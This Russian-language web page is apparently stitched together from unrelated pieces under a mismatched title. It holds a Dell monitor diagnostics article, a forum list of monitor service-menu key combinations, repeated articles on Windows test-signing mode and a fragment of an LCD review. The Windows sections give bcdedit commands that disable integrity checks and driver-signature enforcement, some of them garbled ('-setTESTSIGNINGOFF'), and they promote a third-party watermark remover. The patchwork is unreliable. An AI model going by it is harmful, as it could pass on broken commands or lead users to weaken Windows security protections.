Как выйти из тестового режима монитора: Отключение сообщения «Тестовый режим», отображаемого в Windows

Содержание

Как запустить диагностическое тестирование на мониторе Dell

Симптомы

Запуск диагностического теста на мониторе позволяет определить, нормально ли работает монитор Dell при появлении таких признаков, как пустой или черный экран, нечеткое или размытое изображение, мерцание, искажение, потускнение цвета, горизонтальные или вертикальные полосы, цветные полосы, пузырьки или другие отклонения в работе экрана.


Содержание

  1. Встроенная самодиагностика (BIST), также называемая встроенной диагностикой (BID)
  2. Функция самопроверки (STFC)
  3. Рекомендации по обслуживанию
  4. Инструкции по безопасности
  5. Часто задаваемые вопросы
Причина

Выполнение диагностического теста на мониторе Dell помогает определить, является ли проблема неисправностью монитора Dell.

Если диагностический тест монитора пройден или необходимо дальнейшее устранение неисправностей дисплея или видео на мониторе Dell, см.

статью базы знаний Dell Поиск и устранение неисправностей дисплея и видео на мониторе Dell.

Вы ищете помощь в запуске диагностического теста на ЖК-панели ноутбука Dell? Узнайте, как запустить встроенную самодиагностику ЖК-дисплея на ноутбуке Dell.

Разрешение

Встроенная самодиагностика (BIST), также называемая встроенной диагностикой (BID)

Мониторы Dell оснащены интегрированной системой диагностики, которая помогает определить, является ли источником проблем с экраном монитор Dell.

Необходимо запустить встроенную самодиагностику монитора (BIST) или встроенную диагностику (BID), если вы заметили отклонения (например, мерцание, искажения, проблемы с четкостью, нечеткость или размытое изображение, горизонтальные или вертикальные линии, потускение цвета, искажение изображения).

  1. Перейдите в раздел Dell.com/support/manuals.
  2. Идентифицируйте свой монитор Dell:
    1. Введите номер модели или сервисный код монитора и нажмите кнопку Поиск.
    2. Или нажмите кнопку Обзор всех продуктов, выберите Электроника и аксессуары, Мониторы и аксессуары и выберите монитор Dell из каталога.
  3. На вкладке «Документация» перейдите к разделу «Руководства и документы» и нажмите «Просмотреть PDF-файл» рядом с руководством пользователя монитора.
  4. В Руководстве пользователя в разделе Поиск и устранение неисправностей перейдите на страницу Встроенная диагностика.
  5. Выполните встроенную самодиагностику на мониторе Dell, следуя инструкциям.
  6. Если отклонение экрана отсутствует в режиме встроенной самодиагностики, см. статью базы знаний Dell «Поиск и устранение неисправностей дисплея или видеосигнала» на мониторе Dell.
  7. Если в режиме встроенной самодиагностики на экране присутствует отклонение, обратитесь в службу технической поддержки Dell для получения вариантов ремонта.
ПРИМЕЧАНИЕ. На некоторых мониторах Dell серии D есть другой способ запуска встроенной самодиагностики (BIST). См. статьи базы знаний Dell:

Функция самопроверки (STFC)

В мониторах Dell имеется проверка с помощью функции самодиагностики (STFC), которая позволяет проверить правильность работы монитора Dell в качестве автономного устройства. Если монитор подключен к компьютеру, но экран монитора остается темным или пустым, функция самопроверки (STFC) позволяет проверить, правильно ли работает монитор Dell.

ПРИМЕЧАНИЕ. Проверка с помощью функции самопроверки (STFC) позволяет проверить, что монитор функционирует нормально для использования в качестве автономного устройства. Чтобы диагностировать отклонения (например, мерцание, искажения, нечеткое изображение, горизонтальные или вертикальные линии, потускание цвета и т. д.), см. раздел встроенной самодиагностики данной статьи.
  1. Перейдите в раздел Dell.com/support/manuals.
  2. Идентифицируйте свой монитор Dell:
    1. Введите номер модели или сервисный код монитора и нажмите кнопку Поиск.
    2. Или нажмите кнопку Обзор всех продуктов, выберите Электроника и аксессуары, Мониторы и аксессуары и выберите монитор Dell из каталога.
  3. На вкладке «Документация» перейдите к разделу «Руководства и документы» и нажмите «Просмотреть PDF-файл» рядом с руководством пользователя монитора.
  4. В Руководстве пользователя в разделе Поиск и устранение неисправностей перейдите на страницу Самодиагностика.
  5. Следуйте инструкциям для запуска самодиагностики на мониторе Dell.
  6. Если в режиме проверки с помощью функции самодиагностики не обнаружено отклонений в работе экрана, см. статью базы знаний Dell Поиск и устранение неисправностей дисплея или видео на мониторе Dell.
  7. Если проверка с помощью функции самодиагностики обнаружила отклонения, обратитесь в техническую поддержку Dell для получения вариантов ремонта.
Дополнительная информация

Рекомендации по обслуживанию

При распаковке, очистке или обслуживании монитора Dell следуйте приведенным ниже рекомендациям по обслуживанию и инструкциям.

  • Для очистки антистатического экрана рекомендуется использовать специальную ткань для очистки экрана или раствор, подходящий для антистатического покрытия ЖК-панелей.

    ВНИМАНИЕ! Не используйте бензол, растворитель, аммиак или чистящие средства на основе аммиака, абразивные чистящие средства или сжатый воздух.

  • Для очистки монитора используйте мягкую и чистую ткань из микроволокна, слегка смоченную водой. Не используйте моющие средства любого типа, так как они могут оставить на мониторе матовую пленку.
  • Если при распаковке монитора вы заметите белую пыль, сотрите ее чистой тканью из микроволокна.
  • Обращайтесь с монитором с осторожностью, так как его темная поверхность может поцарапаться, и белые отметины будут на ней более заметны, чем на мониторах более светлых цветов.
  • При перемещении монитора следуйте инструкциям, приведенным в руководстве пользователя, как правильно держать монитор. Не допускайте давления непосредственно на ЖК-экран, так как это может привести к невосстановимым повреждениям.
  • Для обеспечения наилучшего качества изображения используйте динамически сменяющуюся экранную заставку и отключайте монитор, когда он не используется.
ПРЕДУПРЕЖДЕНИЕ.
Перед очисткой монитора отсоедините его кабель питания от розетки, а видеокабели от монитора. Перед очисткой монитора прочитайте инструкции по технике безопасности и следуйте им.

Инструкции по безопасности

Для дисплеев с глянцевой лицевой панелью следует обдумать размещение, так как панель может отражать окружающий свет и яркие поверхности.

Для получения информации по технике безопасности см. Информацию о безопасности, условиях окружающей среды и нормативах (SERI).

Для получения уведомлений FCC (только для США) и другой нормативной информации см. веб-сайт соответствия нормативным требованиям по адресу www.dell.com/regulatory_compliance.

ПРЕДУПРЕЖДЕНИЕ. Использование элементов управления, настроек или процедур, отличных от указанных в руководстве пользователя, может вызвать риск поражения электрическим током и электрических и/или механических повреждений.


Часто задаваемые вопросы

Нажмите, чтобы развернуть приведенные ниже разделы для ознакомления с дополнительными сведениями. Или нажмите Показать все или Скрыть все, чтобы развернуть или скрыть все разделы.

Инструкции по запуску встроенной самодиагностики (BIST) на мониторах Dell с помощью джойстика см. в руководстве пользователя монитора Dell.

  1. Перейдите в раздел Dell.com/support/manuals.
  2. Идентифицируйте свой монитор Dell:
    1. Введите номер модели или сервисный код монитора и нажмите кнопку Поиск.
    2. Или нажмите кнопку Обзор всех продуктов, выберите Электроника и аксессуары, Мониторы и аксессуары и выберите монитор Dell из каталога.
  3. На вкладке «Документация» перейдите к разделу «Руководства и документы» и нажмите
    «Просмотреть PDF-файл»
    рядом с руководством пользователя монитора.
  4. В Руководстве пользователя в разделе Поиск и устранение неисправностей перейдите на страницу Встроенная диагностика.
  5. Следуйте инструкциям для запуска интегрированной самодиагностики на мониторе Dell.
  6. Если в режиме интегрированной самодиагностики не обнаружено отклонений в работе экрана, см. статью базы знаний Dell Поиск и устранение неисправностей дисплея или видео на мониторе Dell.
  7. Если интегрированная самодиагностика обнаружила отклонения, обратитесь в техническую поддержку Dell для получения вариантов ремонта.

Для выявления проблем с ЖК-дисплеем или монитором всегда рекомендуется выполнить проверку с помощью функции самодиагностики (STFC) или встроенной самодиагностики (BIST) на мониторе Dell.

Если проверка с помощью функции самодиагностики (STFC) или встроенного самотестирования (BIST) пройдена, это означает, что монитор работает нормально. Подробнее об устранении проблем с дисплеем или видео см. в статье базы знаний Dell Поиск и устранение неисправностей дисплея и видео на мониторе Dell.

Если проверка с помощью функции самодиагностики (STFC) и/или встроенной самодиагностики (BIST) завершается сбоем, обратитесь в службу технической поддержки Dell для получения вариантов ремонта.

Инструкции по сбросу настроек монитора Dell до заводских настроек по умолчанию (также называемых сбросом до заводских настроек) приведены в руководстве пользователя монитора Dell.

  1. Перейдите в раздел Dell.com/support/manuals.
  2. Идентифицируйте свой монитор Dell:
    1. Введите номер модели или сервисный код монитора и нажмите кнопку Поиск.
    2. Или нажмите кнопку Обзор всех продуктов, выберите Электроника и аксессуары, Мониторы и аксессуары и выберите монитор Dell из каталога.
  3. На вкладке «Документация» перейдите к разделу «Руководства и документы» и нажмите «Просмотреть PDF-файл» рядом с руководством пользователя монитора.
  4. В Руководстве пользователя в разделе Работа с монитором см. раздел Использование экранного меню (OSD).
  5. Следуйте указаниям системы меню, чтобы найти и использовать параметр Сброс до заводских настроек в Экранном меню.

Чтобы просмотреть или скачать руководство пользователя монитора Dell, выполните следующие действия.

  1. Перейдите в раздел Dell.com/support/manuals.
  2. Нажмите Browse all products, затем выберите Electronics and Accessories.
  3. Нажмите Monitors & Projectors, затем выберите Monitors.
  4. Определите и выберите подходящую модель монитора Dell.
  5. Перейдите на вкладку Documentation и перейдите к разделу Manuals and Documents.
  6. Нажмите кнопку PDF рядом с нужным документом.
    • Нажмите More Languages, чтобы просмотреть список доступных языков (если требуется).
    • Нажмите кнопку PDF рядом с нужным языком.
ПРИМЕЧАНИЕ. Большинство руководств доступны в формате PDF. Программу для чтения файлов PDF (Acrobat Reader) можно скачать бесплатно с веб-сайта Adobe.
В начало

Найти дополнительную информацию и обратиться в техническую поддержку по поводу монитора, ноутбука или планшета Dell можно на сайте поддержки мониторов Dell.


Истек срок гарантии? Нет проблем. Посетите сайт Dell.com/support, введите сервисный код Dell и просмотрите наши предложения.

ПРИМЕЧАНИЕ. Предложения доступны только для пользователей персональных компьютеров в США, Канаде, Великобритании, Франции, Германии, Китае и Японии. Предложение не распространяется на серверы и системы хранения.

Alienware and Dell Gaming Monitors, C Series, D Series, E Series, Legacy Monitors, P Series, S Series, SE Series, UltraSharp Premier (UP) Series, UltraSharp (U) Series

07 сент. 2021

Оцените эту статью

Благодарим вас за отзыв.

К сожалению, наша система обратной связи в настоящее время не работает. Повторите попытку позже.

Комментарии не должны содержать следующие специальные символы: ()\

Как войти в сервисное меню монитора » Познавательный блог

Предлагается тема, для помещения методов входа в сервисное (инженерное) меню мониторов. Имеющуюся у меня информацию, выкладываю, дополняйте …

CTX 1569SE
При включении удерживать кнопки «–» и «+». После этого в меню появятся дополнительные пункты: Picture->Special (Grid, Sub-C)

CTX PR5xx, PR7xx
При включении удерживать кнопки «–» и «+». После этого в меню появятся дополнительные настройки

Dell UltraSharp 2005FPW
При включении монитора удерживать кнопки «Menu» и «+», затем нажать кнопку «-»

Iiyama 413
При включении удерживать кнопку «–», после этого на экране появится предупреждающий вопрос. После утвердительного выбора, в меню появятся дополнительные настройки. Альтернативный метод см. для Iiyama HM704UTC

Iiyama 410, 454 Pro
При включении удерживать кнопку «Menu», затем снова выключить монитор. Далее, удерживая кнопку «–», снова включить его. После этого в меню появятся дополнительные настройки

Iiyama 512, 451, 454
Нажмите «Function» в главном меню, и выберите пункт «Language». Далее последовательно выбирайте все языки интерфейса: выберите пункт «Svenska», затем «English» и «Nederladns», потом снова «Svenska» и «English». После этого в меню появятся дополнительные настройки

Iiyama HM704UTC
Войдите в меню монитора, нажатием кнопки «Menu». Выберите пункт «INFORMATION», нажмите кнопку «Menu» и удерживайте её в течение 5 сек

HP 2335
При включении удерживать нажатой кнопку «Menu», после включения в меню появится новый пункт «Service»

LG 1810B, FM776B, FM776C, FB774C, CB291B, CB575B, CB575E, FM77NC, CB775B, CB775C, CB563G, CB995C, CB995B, FB775B, FB775C
При включении удерживать нажатой кнопку «Menu»

LG EB770F вход сервисное меню — при включенном мониторе удерживаем «Влево» и «Power»

LG FB770H, CB777G, CB777H, EB770H, FB770G, EB770G
При включении удерживать нажатой кнопку «стрелка вниз»

LG 575N
При включении удерживать нажатыми кнопки «SET» и «OSD». Затем зайти в меню, выбрать пункт «DEGAUSSING» и активировать его «ON». После этого в меню появятся дополнительные настройки

LG FB795C
Display OSD Menu. During push «SEL» Key and push the «Menu» for 2 seconds

LG FB790G, EB990G, FB775F, EB990E, FB990G, FB795E, CB773D
При включении удерживать нажатой кнопку «SELECT»

LG F700BJ, T710B, T711B, 700BJ, FB915B, F720, T730, FB915BD, FB995C, FB790GD
Push «MENU» After push the «ВЛЕВО» Key and POWER On

LG F00PL, F700PK, F700PJ
При вкл.MENU стрелки ВНИЗ + ВЛЕВО

LG 920P
При включенном мониторе нажать и удерживать кнопки «Select/Input» и «Power» до тех пор, пока не мигнёт изображение на экране. Затем зайти в меню, выбрать пункт «DEGAUSS» и активировать его «ON». После этого в меню появятся дополнительные настройки

Mitsubishi DiamondPro 930SB
При включении удерживать нажатыми кнопки «+» и «–». Вместо режима энергосбережения монитор в автоматическом режиме выводит белое поле. При нажатии «+» (или «–») появляется тестовое изображение. Для выключения меню — при включении удерживать нажатой кнопку «Exit»

Nec XExxx, XPxxx, XVxxx, FExxx
Выбрать в меню «Display Mode» и нажать «Proceed». Потом сразу нажать «Reset» и, удерживая её, нажать одновременно кнопки «» и «». Появится предупреждающая надпись «Warning Entering Service Menu if you continue the warranty is void Press exit to escape», после чего нажать «Proceed» (для отмены — «Escape»). С помощью инженерного меню можно, например, если выйти в «service information», узнать версию процессора, сколько часов и минут монитор проработал и находился в дежурном режиме

Nec 1700NX
При включении удерживать нажатой кнопку «Menu» + «DVI/D-Sub»

Nec 1880SX
При включении удерживать нажатой кнопку «Select/1-2». Инженерное меню состоит из 9 закладок, в которых в добавление к настройкам обычного меню добавлены расширенные. Все регулировки сопровождаются цифровой индикацией

Nec 2090UXi
При включении удерживать нажатой кнопку «Input». Инженерное меню содержит внушительное количество параметров, включая расписание автоматического включения и выключения

Nokia 446XPro, 447XPro
При включении монитора удерживать нажатой кнопку «Menu». Далее, войти в меню и ввести код 7711. После этого в меню появятся дополнительные настройки

Philips Brilliance 190P5
При включении монитора удерживать нажатыми кнопки «Меню» +«Auto». После включения в мнею появится дополнительный пункт, в котором содержится поле «Panel», указываеющее аббревиатуру производителя матрицы

Rolsen C708 Reflex
При включении монитора удерживать нажатой кнопку «OSD»

Scott 772
При включении монитора удерживать нажатыми кнопки «Power» и «Select». После этого во втором пользовательском меню появятся дополнительные настройки

Sony 110ES
При включении монитора удерживать нажатыми кнопки «Enter» и «–». После этого в меню появятся дополнительные настройки

Sony A100, A220, E100, E220, E400, G420
При включеннии монитора удерживать нажатым управляющий «джойстик». После этого в меню появятся дополнительные настройки. Имеется информация, что инженерное меню доступно пользователю только на мониторах Sony, сделанных на базе шасси Capetronics

Sony 205F
Нажать и удерживать кнопку «MENU»

ViewSonic E651
При включении монитора удерживать нажатыми одновременно кнопки «Menu», «–» и «+» (при этом монитор в ждущем режиме будет выводить белое поле с сеткой). Выключить монитор. Снова включить, удерживая нажатыми одновременно кнопки «Menu» и «». После этого в меню появится надпись «FACTORY» и дополнительные настройки (при этом монитор в ждущем режиме будет выводить тестовую последовательность)

ViewSonic PF775
При включении монитора удерживать нажатой кнопку «2». После этого в меню появится дополнительная страница

ViewSonic VG175
При включении монитора удерживать нажатыми кнопки «1» и «2». После активации курсор меню будет находиться на странице «ViewMatch Color», которая ничем не отличается от аналогичной страницы обычного меню. При этом монитор перейдёт в режим повышенной яркости и контрастности (100/100). При нажатии кнопки «1» курсор выйдет на главную страницу, на которой вместо пунктов «Brightness» и «Contrast» («Яркость»/«Контрастность») будут соответственно «Video Gain» и «Video Level» («Усиление видеосигнала»/«Уровень видеосигнала»)

Сервисный режим моделей СТХ без OSD:

На панели четыре светодиода (обозначим их LED1,…,LED4 слева-направо) и пять кнопок: [SELECT], [UP], [DOWN], [+] и [-].
Вход в режим factory setting у всех моделей CTX (без и с OSD) одинаков: держать [+] и [-] при включении питания.
Регулировки в этом режиме.
Горит LED4: [+] и [-] регулируют CONTRAST, [UP] и [DOWN] регулируют BRIGHTNESS.
Горит LED1: [+] и [-] регулируют H-POSITION, [UP] и [DOWN] регулируют V-POSITION.
Горит LED2: [+] и [-] регулируют H-SIZE, [UP] и [DOWN] регулируют V-SIZE.
Горит LED3: [+] и [-] регулируют SIDE-PIN, [UP] и [DOWN] регулируют TILT.
Горят LED4 и LED1: [+] и [-] регулируют R-GAIN, [UP] и [DOWN] регулируют R-BIAS.
Горят LED4 и LED2: [+] и [-] регулируют G-GAIN, [UP] и [DOWN] регулируют G-BIAS.
Горят LED4 и LED3: [+] и [-] регулируют B-GAIN, [UP] и [DOWN] регулируют KEYSTONE.
Обращаю внимание, что регулировки B-BIAS нету.

RoverScan 115GS M557 При включении удерживать нажатой кнопку [Menu].

ViewSonic VE902m
Выключаем монитор кнопкой Power
Нажимаем последовательность кнопок: –, +, Power (монитор включается).
После нажимаем Menu (инженерное меню, должно появляется в верхнем правом углу).

Выход из инженерного меню — нажатие на кнопку Power (выключаем)
После включения монитор работает в своем стандартном режиме.

DELL 1905FP
1. Выключить монитор
2. Зажать кнопки «Menu» и «+» и включить монитор кнопкой «Power»
3. Отпустить все кнопки
4. Зайти в меню монитора, выбрать раздел «Factory Reset» (самый нижний)
5. Выбрать раздел «Factory» (самый нижний, без пиктограммы)

Lcd мониторы ASUS

1 способ: Splendid&Input select&power on/off

для моделей:
MK241H
PG221 SERIES
PG191
PW201
PW191 Series
VK191 Series
MB19 Series
MB17 Series

2 способ: MENU&power on/off

для моделей:
VW246H
VK246H
VW225 Series
VW222 Series
VW220 Series
VW202 Series
VW195 Series
VW192 Series
LS201 Series
VK193 Series
VK192 Series

3 способ: включить и выдернуть кабель питания, удерживая нажатой MENU подключить кабель питания, далее MENU и <— (стрелка влево) опять нажать MENU

для моделей:
VW266H
VW223 Series
vw221 Series
VW198 Series
VW193 Series
VW191 Series
VK222 Series
VK221 Series
MW221 Series
VB191 Series
VB171 Series
MM19 Series

По материалам : https://monitor. net.ru/forum/service-monitors-info-119277.html

В винде написано тестовый режим. Включение и выключение тестового режима Windows

Аппаратная конфигурация компьютеров, на которые устанавливается Windows, может существенно отличаться по целому ряду параметров, как могут разниться между собой и сами версии и редакции ОС. Именно по этой причине создаваемые под Windows приложения должны быть универсальными в плане совместимости. Так оно обычно и бывает, однако существуют софт, для запуска которого требуется особый режим, называемый режимом тестирования.

Что такое тестовый режим и когда он активируется

Тестовый режим Windows 10 можно условно назвать состоянием «лояльности» системы к программному обеспечению, не имеющему соответствующих электронных подписей. В таком режиме система понижает уровень безопасности, что позволяет администратору устанавливать нестабильное ПО. Кроме того, на 64-битных системах появляется возможность обходить определенные ограничения безопасности.

В обычных условиях режим тестирования, как правило, сам собой не активируется. Для его включения требуется соответствующее действие пользователя или сторонней программы. О том, что Виндовс работает в Test Mode, со всей ясностью говорит надпись «Тестовый режим Windows 10…» в правом нижнем углу монитора. Сам же режим вступает в силу в случае отключения юзером в загрузочном меню либо намеренного его включения с помощью штатной консольной тулзы bcdedit или сторонней утилиты Driver Signature Enforcement Overrider .

Текстовая ватемарка в углу рабочего стола может появиться, хотя и не сразу, в модифицированных сборках Windows, если автор решил деактивировать некоторые функции верификации. Также логотипом могут быть отмечены инсайдерские сборки системы, выпускаемые Microsoft. Ниже мы покажем, как выйти из тестового режима Windows 10, но для начала посмотрим, как скрыть с экрана назойливое сообщение, указывающее на его активность.

Как удалить надпись «Тестовый режим»

Если используете Test Mode на постоянной основе, рано или поздно уведомляющий текст рядом с системным лотком начнет вам надоедать и, скорее всего, вы захотите от него избавиться. Но как убрать надпись «Тестовый режим» в Windows 10 в правом нижнем углу не выходя из самого режима? Очень даже легко, достаточно лишь воспользоваться маленькой портативной утилитой Universal Watermark Disabler , найти которую без проблем можно на просторах интернета. Запустите ее, нажмите кнопку «Install» и подтвердите действие.

При этом работа Проводника будет завершена, экран станет черным, сессия пользователя автоматически завершится, но когда вы зайдете в систему повторно, то увидите, что раздражающая надпись около системного трея исчезла. Если же через некоторое время вы захотите ее вернуть, программу нужно запустить повторно и на этот раз нажать кнопку «Uninstall».

В новейших сборках Windows 10 корректность работы Universal Watermark Disabler не гарантируется, например, в Windows 10 16299 утилита выдала ошибку «Сбой при удаленном вызове процедуры», что, однако, не помешало ей благополучно скрыть надпись. Тем не менее, этот способ является наиболее универсальным.

Пользователями Windows 10 предлагались также и другие способы избавления от логотипа, в частности, манипуляции с файлами в каталоге %userprofile%/AppData/Roaming/Microsoft/Windows/Themes . Но как показала практика, такие действия редко приводят к желаемому результату, либо их успешность носит временный характер.

Как отключить тестовый режим совсем

Ну что же, теперь настала пора узнать, как выключить тестовый режим Windows 10 вообще. Делается это очень просто с помощью консольного инструмента bcdedit.exe . Приведенный здесь способ работает не только в актуальной десятой версии Виндовс, но и в «восьмерке», и в «семерке». Запустите с привилегиями администратора командую строку либо консоль PowerShell и выполните в ней команду bcdedit.exe -set testsigning off , а затем перезапустите машину. Готово, режим тестирования деактивируется, а уведомляющий текст в системном трее исчезнет.

Есть, правда, малая вероятность, что отключить тестовый режим Windows 10 так сразу не удастся. Если после выполнения команды вы обнаружите, что ватемарка по-прежнему «украшает» нижний правый угол десктопа, вернитесь к консоли и выполните в ней сначала bcdedit.exe -set loadoptions enable_integrity_checks , а затем повторите команду, указанную в абзаце выше.

На сей раз тестовый режим должен полностью отключиться, равно как должен исчезнуть с экрана и его водяной знак.

Немного о том, для чего нужен тестовый режим. С сайта Майкрософт:

То есть в тестовом режиме можно пользоваться программами, драйверы которых не имеют цифровой подписи компании Microsoft.

Тестовый режим Windows 7. Как включить и как отключить.

Некоторые программы при установке требуют перехода Windows в тестовый режим. Лично я столкнулся с этим, пытаясь установить небольшую утилиту под названием OpenedFilesView. При установке она спрашивала, перейти ли в тестовый режим подписи драйверов, на что я ради интереса и согласился.

Как отключить тестовый режим windows 7

У вас появилась надпись: «Тестовый режим» и номер сборки? Такое бывает, если вы нечаянно, при установке какой-то программы, выбрали разрешения на переход в тестовый режим, в который вошли после перезагрузки компьютера. Давайте разберем – как отключить тестовый режим в windows 7 и избавиться от надоедливой надписи в нижнем правом углу рабочего стола.

Возможно, как и у меня, переход в тестовый режим у вас осуществился после установки программы небольшого размера под названием OpenedFilesView. Когда она устанавливается, инсталлятор задает вопрос «Перейти ли в тестовый режим?» и пользователь, считая это бесполезным действием, соглашается.

Как оказалось, проблема, если ее можно так назвать, решается достаточно легко. Windows 7 — тестовый режим как отключить? Всего одной строчкой!

Все уже запомнили, что мы много раз в своих статьях использовали утилиту «Выполнить» — этот случай не исключение.

Итак, переходим туда с помощью Win+R и вводим такую команду:

Bcdedit.exe -setTESTSIGNINGOFF.

После нажатия на «Ок» и перезагрузки, система выйдет из тестового режима.

Итак. Чтобы отключить тестовый режим в Windows 7, открываем «Пуск»-«Выполнить» (либо нажимаем комбинацию клавиш Win+R) и вводим следующее:

Bcdedit. exe -set TESTSIGNING OFF

Но помните, если вам когда-то понадобится его включить обратно, нужно будет совершить те же действия, но вместо OFF использовать ON. То есть, чтобы включить тестовый режим в Windows 7, открываем «Пуск»-«Выполнить» и вводим следющее:

Bcdedit.exe -set TESTSIGNING ON

Теперь вы убедились, что отключить тестовый режим windows 7 очень просто.

Тестовый режим Windows 10 был добавлен в вашу ОС специально, чтобы вы могли устранить проблемы или взаимодействовать с некоторыми другими устройствами.

Некоторые пользователи подключают к своему ПК устройства на других ОС. Например, смартфоны с Android. Для такого оборудования бывает необходимо устанавливать неподписанные или специфичные драйвера. В этих ситуациях рекомендуется использовать тестовый режим Windows 10, о котором стоит поговорить подробнее.

Иногда в таких условиях выпускались какие-то новые сборки этой операционной системы. Например, build 10586. Но в этом случае речь шла о версии, которая ещё не считается официальной и в ней некоторые функции ограничивались самими разработчиками.

Для перехода ОС в такой режим и её нормального функционирования в нём, предварительно в выключается возможность безопасной загрузки. Сегодня многие производители устанавливают разные способы для перехода к таким настройкам в материнских платах. Есть различия и в оформлении всех этих настроек, но не существенные. В общем случае действия пользователя могут быть следующими:

  • Запуск BIOS или UEFI;
  • «Тип ОС» – «Другие ОС».

После этого нужно сохранить все параметры и перезагрузить устройство. При отсутствии пункта с безопасной загрузкой можно говорить о его отключении на аппаратном уровне. Поэтому все вышеописанные действия вам выполнять не нужно. Конечно, чтобы система предложила вам безопасную загрузку должно пройти несколько неудачных попыток запустить ОС, что не очень правильно делать умышленно.

Вот теперь и возможно будет запускать тестовый режим в ОС Windows 10, где определённые ограничения на установку специфичных драйверов снимаются. Для этого нужно обладать администраторскими правами, с которыми и запускается сама командная строка. Здесь вводится:

  • «bcdedit.exe -set loadoptions DISABLE_INTEGRITY_CHECKS»;
  • «bcdedit.exe -setTESTSIGNING ON».

Для каждой команды вам придётся дождаться её полного выполнения, и лишь потом вводить вторую. Когда последняя будет выполнена, появится соответствующее уведомление. Затем нужно будет перезагрузиться. Справа в нижнем углу должно будет появиться соответствующее уведомление.

Как отключить тестовый режим

Когда вы захотите отключить этот режим, то вам нужно будет вводить те же команды. Но вторая из них будет писаться по-другому:

  • «bcdedit.exe -setTESTSIGNING OFF»

Вы должны понимать, что все описанные действия серьёзно снижают уровень безопасности ОС, поэтому будьте внимательны. Учтите, что даже наличие или любого другого мощного антивируса, даже входящего , ваш ПК все равно под угрозой и пока вы находитесь в данном состоянии, он уязвим буквально ко всему. Поэтому, завершайтесь сразу, как необходимость отпадает.

Обязательно добавьте нашу страничку в закладки, так как часто люди понимают, как включить тестовый режим на Windows 10, а затем испытывают проблемы с его отключением. Но ведь важно знать и то, и другое, и выше мы представили для вас инструкцию для обеих ситуаций. И если вам получится запуститься, то значит и отключить вы сможете без проблем, главное следуйте нашей инструкции.

Нередко бывает, что тестовый режим создаёт немало неудобств в процессе работы компьютера. Операционная система Windows 10 к сожалению не является исключением из этого правила. Устанавливая на компьютер драйвера, которые ещё не до конца дописаны, вы можете по истечению некоторого времени увидеть надпись «Тестовый режим» на экране компьютера. Появляется она, как правило, в правом нижнем углу экрана.

Следует отметить, что скорость работы процессора от появления этой надписи не снизится, но некоторым пользователям она просто мешает. Именно поэтому сегодня мы вам расскажем, как отключить тестовый режим и как убрать лишние надписи на мониторе.

Тестовый режим в Windows 10 – что это такое?

Специально для ОС Windows разрабатывается огромное количество приложений, которые должны быть совместимы с различными компьютерами. Однако всем известно, что компьютеры отличаются на только своей «начинкой», но версиями программ, которые на них установлены. Для тестирования какого-либо приложения или драйвера любой пользователь может установить его и использовать в тестовом режиме.

Стоит отметить, что при использовании таких программ на версиях 64-битной операционной системы возможно снятие части ограничений безопасности.

Как отключить тестовый режим в Windows 10?

Существует несколько способов отключения тестового режима, начнём с самого простого:
1.Заходим в меню «Пуск».
2. В открывшемся окне выбираем вкладку «Командная строка» либо «Командная строка администратора».
3. При нажатии на одну из них правой кнопкой мыши откроется окно чёрного цвета. В него нужно будет скопировать вот такую команду — bcdedit. exe -set TESTSIGNING OFF.

  1. Далее нажимаем на кнопку Enter. Если вы всё сделали правильно, то в открывшемся окне, внизу после введённой команды появится надпись – «Операция успешно завершена».

  1. Для того чтобы изменения вошли в силу компьютер нужно перезагрузить. После перезагрузки режим отключится.

Как ещё можно убрать надпись о тестовом режиме с интерфейса компьютера

Если по каким-либо причинам отключить тестовый режим через командную строку не получилось, то можно попробовать следующие:

  1. Установить на компьютер бесплатное приложение, которое помогает убирать различные надписи с рабочего стола. Это может быть, к примеру, Universal Watermark Disabler.
  2. Скачиваем и устанавливаем программу на компьютер. Запускаем её и нажимаем на кнопку Install. В открывшемся окне кликаем на кнопку со словом «Да».
  3. Перезагружаем компьютер. После перезагрузки надпись исчезает.

Как отключить тестовый режим на компьютере с операционной системой Windows 10 pro

Эта операционная система разрабатывалась специально для представителей бизнеса. Windows 10 pro позволяет получить доступ к более широкому доступу к различным приложениям. Однако её нередко устанавливают и для домашних ПК.

Для того чтобы отключить тестовый режим в этом случае можно использовать тот же способ с командной строкой. Обычно он помогает удалить запись на рабочем столе.

Если вы наоборот хотите протестировать приложение или драйвер, вам потребуется сделать следующее:
1. Заходим в меню «Пуск», далее переходим в командную строку и кликаем по ней правой кнопкой мыши.

Изначально «семерка» настроена таким образом, что не допускает к установке неподписанные драйвера. Это специальная защита системы. Убирается она в случае активации тестового режима Win 7.

Настройка тестового режима

Тестовый режим Виндовс 7 может включиться в результате установки какого-либо ПО, в инсталлятор которого встроен соответствующий скрипт. Рядовой пользователь легко заметит изменение в системе по надписи снизу экрана. Она небольших размеров, но все равно серьезно отвлекает.

В таком случае потребуется деактивация этой функции.

Но бывают и обратные ситуации, например, когда нужно поставить пользовательский софт. А сделать это невозможно без активации работы с неподписанными драйверами.

Отключение

Всех, кому мешает надпись на рабочем столе, заинтересует способ, как отключить тестовый режим в Windows 7. Делается это из Командной строки. Для ее запуска откройте «Пуск» , в полном списке найдите раздел «Стандартные» , там располагается нужный пункт. Нажмите по нему ПКМ, а затем «Запуск от…» .

В текстовом поле с мигающим курсором пропишите запрос bcdedit.exe -set loadoptions ENABLE_INTEGRITY_CHECKS , а затем нажмите Enter, после чего — bcdedit.exe -set TESTSIGNING OFF


Примечание: вставить текст не получится, нужно вбивать его вручную с клавиатуры.

Остается только перезагрузить систему.

Важно: если открыть командную строку без администраторских прав, то ввод команды будет сопровождаться сообщением «Отказано в доступе» . Это говорит о том, что вы пропустили пункт «Запуск от…» .

Активация

Активация тестового режима необходима для установки неподписанных драйверов, например, разработанных пользователями, которые требуются для синхронизации какого-либо устройства с компьютером. Но бывают и другие причины, при которых понадобится данная функция.

Вновь запустите Командную строку по инструкции из прошлого раздела. Опять активируйте первый запрос. Отобразится уведомление об успешности, затем пропишите bcdedit.exe -set TESTSIGNING ON

Исчерпывающий тест 28 жидкокристаллических мониторов — Ferra.ru

Рис. 3. К вопросу о допустимых углах обзора.

Контрастность. Контрастность — еще одно больное место ЖК-матриц. Данный параметр определяется как отношение яркости абсолютно белой точки (все составляющие полностью открыты) и абсолютно черной точки (все RGB-составляющие полностью перекрыты) при оптимальной настройке яркости и контрастности монитора. Обычные электронно-лучевые трубки имеют контрастность не ниже, чем самые дорогие ЖК-матрицы (300:1), однако в этом последние очень быстро прогрессируют. Данный параметр мы не измеряли непосредственно, а просто указали те модели, матрицы которых имеют очевидный недостаток или, наоборот, очевидное преимущество в контрастности.

